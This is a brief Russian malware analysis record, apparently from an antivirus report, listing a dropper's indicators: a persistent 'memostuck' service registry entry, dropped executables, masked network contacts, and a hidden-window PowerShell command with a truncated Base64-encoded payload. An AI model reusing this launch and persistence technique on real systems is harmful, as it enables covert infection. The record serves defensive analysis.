Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\memostuck] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\memostuck] 'ImagePath' = '"<SYSTEM32>\memostuck.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAG4AawBrAHAAYQBkAHMAbAByAHEAZwA9ACcATgBmAHgAcQB2AG0AYQBmAHMAZgB1AGcAJwA7ACQAQwBjAHIAZgBjAGoAdAB5AG8AaABhAGgAYgAgAD0AIAAnADEAMAA1ACcAOwAkAEkAZgB0AGMAcQB2AG8AaAA9ACcAVwB5AGsAZwB...
- %HOMEPATH%\105.exe
- %HOMEPATH%\105.exe в <SYSTEM32>\memostuck.exe
- http://18#.#5.143.170/FNMFKV4GdZw8R
- DNS ASK in######.farmaciaartesanal.com
- DNS ASK ol###ehls.com
- '%HOMEPATH%\105.exe'
- '<SYSTEM32>\memostuck.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAG4AawBrAHAAYQBkAHMAbAByAHEAZwA9ACcATgBmAHgAcQB2AG0AYQBmAHMAZgB1AGcAJwA7ACQAQwBjAHIAZgBjAGoAdAB5AG8AaABhAGgAYgAgAD0AIAAnADEAMAA1ACcAOwAkAEkAZgB0AGMAcQB2AG8AaAA9ACcAVwB5AGsAZwB...' (со скрытым окном)